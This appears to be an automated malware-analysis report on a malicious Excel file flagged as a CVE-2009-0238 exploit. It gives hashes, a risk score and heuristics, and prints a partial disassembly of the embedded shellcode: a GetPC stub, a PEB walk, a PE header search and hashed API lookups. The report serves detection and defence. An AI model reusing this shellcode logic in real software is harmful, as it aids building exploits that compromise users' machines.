Malicious Office (OLE) / .RL — malware analysis report

Static analysis result for SHA-256 f2ab204255c30878…

MALICIOUS

Office (OLE) / .RL

144.8 KB Created: 2007-01-19 05:34:10 Authoring application: Microsoft Excel First seen: 2026-06-21
MD5: c574926af45f972190b008d6c8ff3d4e SHA-1: 46181cf01e08b1760cecac95bbd486dd3b808988 SHA-256: f2ab204255c3087814a638b297e248b2c2e81bd3682bdcdd52cf4baff539d1d3
220 Risk Score

Heuristics 5

  • Excel invalid object access exploit — CVE-2009-0238 critical CVE likely CVE_2009_0238
    Excel workbook contains repeated malformed OBJ records whose ftMacro subrecord points to 0xFFFF, paired with shellcode-style payload context. This matches the invalid-object access exploit shape used by CVE-2009-0238 rather than a generic BIFF anomaly.
  • x86 GetPC stub (CALL $+5; POP EBX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EBX)
    Disassembly
    x86 disassembly · validity: code (0.984) — 9/9 branch targets land on an instruction boundary (100% coherence)
    000046E1  e800000000        call 0x46e6
000046E6  5b                pop ebx
000046E7  648b3518000000    mov esi, dword ptr fs:[0x18]
000046EE  ad                lodsd eax, dword ptr [esi]
000046EF  8338ff            cmp dword ptr [eax], -1
000046F2  7404              je 0x46f8
000046F4  8b00              mov eax, dword ptr [eax]
000046F6  ebf7              jmp 0x46ef
000046F8  8b4004            mov eax, dword ptr [eax + 4]
000046FB  250000ffff        and eax, 0xffff0000
00004700  6681384d5a        cmp word ptr [eax], 0x5a4d
00004705  750e              jne 0x4715
00004707  8b583c            mov ebx, dword ptr [eax + 0x3c]
0000470A  03d8              add ebx, eax
0000470C  66813b5045        cmp word ptr [ebx], 0x4550
00004711  7502              jne 0x4715
00004713  eb03              jmp 0x4718
00004715  48                dec eax
00004716  ebe3              jmp 0x46fb
00004718  81ec80020000      sub esp, 0x280
0000471E  8bf4              mov esi, esp
00004720  8906              mov dword ptr [esi], eax
00004722  c7462400000000    mov dword ptr [esi + 0x24], 0
00004729  ff36              push dword ptr [esi]
0000472B  6815883d6c        push 0x6c3d8815
00004730  e88a010000        call 0x48bf
00004735  894604            mov dword ptr [esi + 4], eax
00004738  ff36              push dword ptr [esi]
0000473A  686389d14f        push 0x4fd18963
0000473F  e8                .byte 0xe8
00004740  7b                .byte 0x7b
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 95% of instructions — a sled or padding/filler run, not program logic).
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API

Open this report in the interactive analyzer, or submit your own file for analysis.